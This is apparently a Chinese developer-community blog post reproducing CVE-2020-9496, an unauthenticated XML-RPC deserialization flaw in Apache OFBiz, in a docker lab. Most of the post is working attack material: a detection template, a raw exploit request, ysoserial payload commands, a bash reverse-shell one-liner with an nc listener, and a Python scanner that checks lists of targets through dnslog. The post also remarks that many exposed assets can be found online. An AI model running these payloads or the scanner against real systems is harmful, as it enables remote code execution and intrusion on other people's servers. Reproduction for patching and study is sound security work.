备案控制台
探索云世界
开发者社区 开发与运维 文章 正文

Apache Ofbiz XML-RPC反序列化漏洞(CVE-2020-9496)

2023-02-14 485
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: Apache Ofbiz XML-RPC反序列化漏洞(CVE-2020-9496)

Apache Ofbiz介绍

OFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。OFBiz最主要的特点是OFBiz提供了一整套的开发基于Java的web应用程序的组件和工具。包括实体引擎, 服务引擎, 消息引擎, 工作流引擎, 规则引擎等。

漏洞概述

Apache ofbiz 存在反序列化漏洞,攻击者 通过 访问未授权接口,构造特定的xmlrpc http请求,可以造成远程代码执行的影响。

漏洞影响版本

ApacheOfbiz:<17.12.04

环境搭建

本次环境使用vulhub搭建


dockerpull andyjunghans/ofbizdocker run -p 8080:8080 -p8443:8443 andyjunghans/ofbiz


访问ip:8080/webtools/control/xmlrpc即可看到入口点

640.png

漏洞复现

Poc

    id: CVE-2020-9496
info:  name: Apache OFBiz XML-RPC Java Deserialization  author: dwisiswant0  severity: medium
  # This temaplte detects a Java deserialization vulnerability in Apache  # OFBiz's unauthenticated XML-RPC endpoint /webtools/control/xmlrpc for  # versions prior to 17.12.04.  # --  # References:  # - https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz
requests:  - raw:      - |        POST /webtools/control/xmlrpc HTTP/1.1        Host: {{Hostname}}        Content-Type: application/xml
        <?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>    matchers-condition: and    matchers:      - type: word        words:          - "faultString"          - "No such service [ProjectDiscovery]"          - "methodResponse"        condition: and        part: body      - type: word        words:          - "Content-Type: text/xml"        part: header      - type: status        status:          - 200

    根据这个yaml,可以了解到,当post一个xml的poc过去后,如果返回包里同时存在

    faultString,No such service [ProjectDiscovery],methodResponse证明有漏洞存在。


    代码执行

    Burp抓包,把数据包替换成以下数据包

      POST /webtools/control/xmlrpc HTTP/1.1Host: 192.168.240.141:8443Content-Type: application/xmlContent-Length: 4125
<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">payload</serializable></value></member></struct></value></param></params></methodCall>


      使用使用ysoserial的CommonsBeanutils1来生成Payload在tmp目录写入文件(无回显)


      java -jar ysoserial.jar CommonsBeanutils1 "touch /tmp/success" | base64 |  tr -d '\n'


      640.png


      复制base64编码得payload,粘贴到burp数据包中base64payload的地方,点击发送,可以进docker中查看是否写入成功

      640.png

      进入容器查看成功写入


      docker exec -it 容器id /bin/bash

      640.png


      反弹shell

      去以下网址把反弹shellpayload进行base64编码

      http://www.jackson-t.ca/runtime-exec-payloads.html

      bash反弹命令:bash-i >& /dev/tcp/ip/port 0>&1

      640.png

      把编码后的shell在使用ysoserial工具进行一次base64编码


      java -jar ysoserial.jar  CommonsBeanutils1 "base64-payload" | base64 |  tr -d '\n'

      640.png

      nc设置监听,把生成的exp放入到burp的数据包中发送,查看nc监听以返回shell

      640.png

      640.png

      通过搜索引擎发现资产还是很多的

      640.png

      检测脚本

      无回显通过dnslog进行检测验证

        import sysimport argparseimport subprocessimport requestsfrom time import sleepimport base64from requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():    print('+-------------------+')    print('| author:lemonlove7 |')    print('| use:python poc.py |')    print('+-------------------+')
def dnslog():    global dns_session    dns_session = requests.session()    dns = dns_session.get('http://www.dnslog.cn/getdomain.php')    return dns.text
def dnslog_res():    dns_res = dns_session.get('http://www.dnslog.cn/getrecords.php')    if dns_res.json():        return True    else:        return False
def CVE_2020_9496(target_url):    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)    headers = {'Content-Type': 'application/xml'}    # popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', "CommonsBeanutils1", 'ping '+dnslog()], stdout=subprocess.PIPE)    popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', "URLDNS", 'http://'+dnslog()], stdout=subprocess.PIPE)    data = base64.b64encode(popen.stdout.read())    post_data = f'''<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">{str(data, 'utf-8')}</serializable></value></member></struct></value></param></params></methodCall>'''    if target_url.startswith('https://'):        vuln_url = target_url + "/webtools/control/xmlrpc"    else:        vuln_url = 'https://' + target_url + "/webtools/control/xmlrpc"    try:        r = requests.post(vuln_url, data=post_data, headers=headers, verify=False, timeout=5)        if r.status_code == 200:            sleep(2)            if dnslog_res():                print(f'[+] {target_url}  dnslog验证成功,漏洞存在')                return True            else:                print(f'[x] {target_url}  利用失败')    except Exception:        print(f"[x] {target_url}  poc请求失败 ")
if __name__ == '__main__':    if len(sys.argv) == 1:        title()        sys.exit()    parser = argparse.ArgumentParser(description='''CVE-2020-9496 help''')    parser.add_argument('-u', '--url', help='请输入url', default='')    parser.add_argument('-f', '--file', help='请输入file', default='')    args = parser.parse_args()    url = args.url    file = args.file    if url != '':        target_url=url        if target_url:            CVE_2020_9496(target_url)    if file !='':        f = open(file,'r')        for i in f.readlines():            url=i.strip()            if url:                CVE_2020_9496(url)

        640.png

        文章标签:
        云解析DNS
        Java
        Shell
        容器
        应用服务中间件
        网络协议
        Docker
        Apache
        安全
        数据格式
        XML
        关键词:
        apache XML
        Apache漏洞
        Apache反序列化漏洞
        Apache ofbiz
        Apache xml-rpc
        游客az7yd3cqma4aw
        目录
        相关文章
        老马啸西风2024
        |
        11天前
        |
        XML 安全 Java
        从零手写实现 apache Tomcat-02-web.xml 入门详细介绍
        `web.xml`是Java Web应用的核心配置文件,描述应用工作方式。它包含Servlet、Filter和Listener的定义。例如,示例展示了如何配置名为`my`的Servlet处理`/my`请求,`LoggingFilter`拦截所有请求,以及`MyServletContextAttrListener`监听应用事件。`web.xml`是服务器理解应用结构与行为的指南。迷你版Tomcat实现——mini-cat(开源:https://github.com/houbb/minicat)。
        老马啸西风2024
        20 1
        857技术社区
        |
        2月前
        |
        XML Java Apache
        Apache Flink自定义 logback xml配置
        Apache Flink自定义 logback xml配置
        857技术社区
        169 0
        李火火
        |
        8月前
        |
        安全 应用服务中间件 Apache
        Apache-Tomcat-Ajp文件读取漏洞(CVE-2020-1938、CNVD-2020-10487)
        Apache-Tomcat-Ajp文件读取漏洞产生原因是由于Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件
        李火火
        301 1
        yuanzhengme
        |
        5月前
        |
        SQL Java 数据库连接
        Java【付诸实践 01】使用org.apache.ibatis.plugin.Interceptor拦截器实现全局mapper.xml参数注入(可用于切换数据库实例schema)源码实例分享
        Java【付诸实践 01】使用org.apache.ibatis.plugin.Interceptor拦截器实现全局mapper.xml参数注入(可用于切换数据库实例schema)源码实例分享
        yuanzhengme
        41 0
        No8g攻城狮
        |
        7月前
        |
        存储 安全 Java
        【Shiro】Apache Shiro 默认密钥致命令执行漏洞(CVE-2016-4437)的解决方案
        【Shiro】Apache Shiro 默认密钥致命令执行漏洞(CVE-2016-4437)的解决方案
        No8g攻城狮
        154 0
        李火火
        |
        8月前
        |
        安全 Java Shell
        Apache Log4j2 远程代码执行漏洞
        Apache Log4j2是一个·基于Java的日志记录工具,该工具重写了Log4j框架,并且引入大量丰富的特性,该日志框架被大量用于业务系统开发,用来记录日志信息。
        李火火
        62 2
        李火火
        |
        8月前
        |
        SQL 安全 数据可视化
        Apache Superset 未授权访问漏洞(CVE-2023-27524)
        Apache Superset 存在未授权访问漏洞,攻击者可利用该漏洞验证和访问未经授权的资源。
        李火火
        144 1
        Tom弹架构
        |
        9月前
        |
        安全 druid Java
        【紧急】Apache Log4j任意代码执行漏洞安全风险升级修复教程
        近期一个 Apache Log4j 远程代码执行漏洞细节被公开,攻击者利用漏洞可以远程执行代码。经过分析,该组件存在Java JNDI注入漏洞,当程序将用户输入的数据进行日志,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。
        Tom弹架构
        220 1
        云鲨RASP
        |
        11月前
        |
        消息中间件 存储 安全
        【高危】 Apache Kafka 远程代码执行漏洞复现及攻击拦截 (CVE-2023-25194)
        漏洞分析,点击详阅
        云鲨RASP
        476 0
        编程达人
        |
        12月前
        |
        XML Dubbo Java
        带你读《Apache Dubbo微服务开发从入门到精通》——四、 XML配置
        带你读《Apache Dubbo微服务开发从入门到精通》——四、 XML配置
        编程达人
        73 1

        热门文章

        最新文章

      • 1
        xml文件使用及解析
      • 2
        学习 XQuery:XML数据查询的关键
      • 3
        XML文档节点导航与选择指南
      • 4
        Java中XML和JSON的比较与应用指南
      • 5
        mybatis中在xml文件中通用查询结果列如何使用
      • 6
        使用JSON和XML:数据交换格式在Java Web开发中的应用
      • 7
        C# 解析XML文件
      • 8
        一个不错的的rpc开源代码-rest_rpc
      • 9
        html和xml
      • 10
        SpringMVC常用Maven POM.xml依赖包片段
      • 1
        Apache Flink官方网站提供了关于如何使用Docker进行Flink CDC测试的文档
        285
      • 2
        Apache Hadoop YARN基本架构
        27
      • 3
        Apache工作模式详解
        13
      • 4
        Spring Boot集成Redis启动失败【Caused by: java.lang.ClassNotFoundException: org.apache.commons.pool2.impl.G】
        89
      • 5
        【问题解决】nested exception is org.apache.ibatis.exceptions.TooManyResultException:Expected one result
        45
      • 6
        性能工具之 Apache Bench 入门使用
        25
      • 7
        Linux Apache服务详解——Apache虚拟目录与禁止显示目录列表实战
        24
      • 8
        Apache Flink自定义 logback xml配置
        169
      • 9
        使用Amazon EMR和Apache Hudi在S3上插入,更新,删除数据
        120
      • 10
        一文了解Apache Hudi架构、工具和最佳实践
        135

        • 相关课程

        更多
      • Apache RocketMQ:如何从互联网时代演进到云
      • Apache Flink 入门到实战 - Flink开源社区出品
      • Apache Flink 入门
      • XML入门
      • Java Web开发-Web应用、Tomcat、HTTP请求与响应

        • 相关电子书

        更多
      • Apache Flink技术进阶
      • Apache Spark: Cloud and On-Prem
      • Hybrid Cloud and Apache Spark

        • 推荐镜像

        更多
      • apache
      • packman
      • CPAN
        • 下一篇
        部署LAMP环境(Alibaba Cloud Linux 3)